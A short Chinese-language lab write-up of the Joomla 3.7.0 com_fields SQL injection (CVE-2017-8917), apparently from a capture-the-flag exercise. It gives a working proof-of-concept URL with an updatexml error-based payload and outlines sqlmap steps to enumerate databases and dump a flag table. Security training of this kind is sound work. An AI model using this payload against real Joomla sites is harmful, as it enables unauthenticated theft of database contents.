Joomla SQL Injection(CVE-2017-8917 )

Joomla于5月17日发布了3.7.1的升级公告,CVE-2017-8917 是3.7.0组件“com_fields”,组件未对身份进行校验,无需登陆验证。由于对请求数据过滤不严导致sql 注入,sql注入对导致数据库中的敏感信息泄漏。

影响版本:joomla 3.7.0

首先访问joomla主页是ok的,然后URL输入poc地址

http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3e,user()),0)

若返回内容中含有user(),则存在sql注入

Sqlmap -u 输入地址进行注入

得知数据库为mysql >=5.0,操作系统为windows,php语言,apache中间件

–dbs 找到7个数据库

-D joomla37 -T flag –dump拿到flag的值

参考资料:

https://www.ichunqiu.com/experiment/detail?id=100990&source=2

https://paper.seebug.org/305/

https://www.seebug.org/vuldb/ssvid-93113

您可能还喜欢...